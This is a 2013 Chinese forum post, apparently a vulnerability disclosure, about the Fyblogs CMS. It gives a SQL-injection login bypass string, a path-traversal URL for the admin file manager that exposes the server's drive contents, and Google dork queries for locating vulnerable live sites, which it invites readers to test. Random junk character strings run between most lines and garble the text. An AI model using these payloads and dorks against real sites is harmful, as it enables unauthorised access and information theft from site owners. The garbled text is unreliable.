漏洞类型: 未授权访问/权限绕过
) s# k4 O: l" k; F* r! Z. k( \
0 }% o# u0 ^5 G4 R% u0 @简要描述:9 t" n- W) P) d2 [: F; g& ]
; l; e# p1 n' b0 D) Q
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
7 _& ^# v% c. |' O" O! K, R7 p& ? c! X6 u
详细说明:1 J; N0 N0 J5 ]
4 _, B, \$ T4 S1 b3 z3 K, z6 h
后台万能密码 'or'='or'5 W: w9 `# M5 q! u4 j) o
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
' a% Q, }7 ~: B8 wadmin/uploadfile.asp?currentFolder=/upfiles/../
( O1 ]9 ^1 H9 F' m) V1 T( c- Q- A0 D; _! `; a A/ y/ W
漏洞证明:
1 y/ q% n3 a ]+ W
U5 ~3 B. O- b6 a" {谷歌:inurl:type.asp?id=1 新闻中心
3 Z: V5 p) _- H9 j2 O或者 :inurl:download_ok.asp?
" n6 ~! s# A' n( g
Q% _& ~' B2 V$ A可以测试
2 c, e B- [7 {& ^) i, w y1 Y/ a# Q4 D, s# O8 d
7 K. |2 \; ?( v/ k2 L: }# ~. i |
发表于 2013-3-7 13:07:46
收藏
支持
反对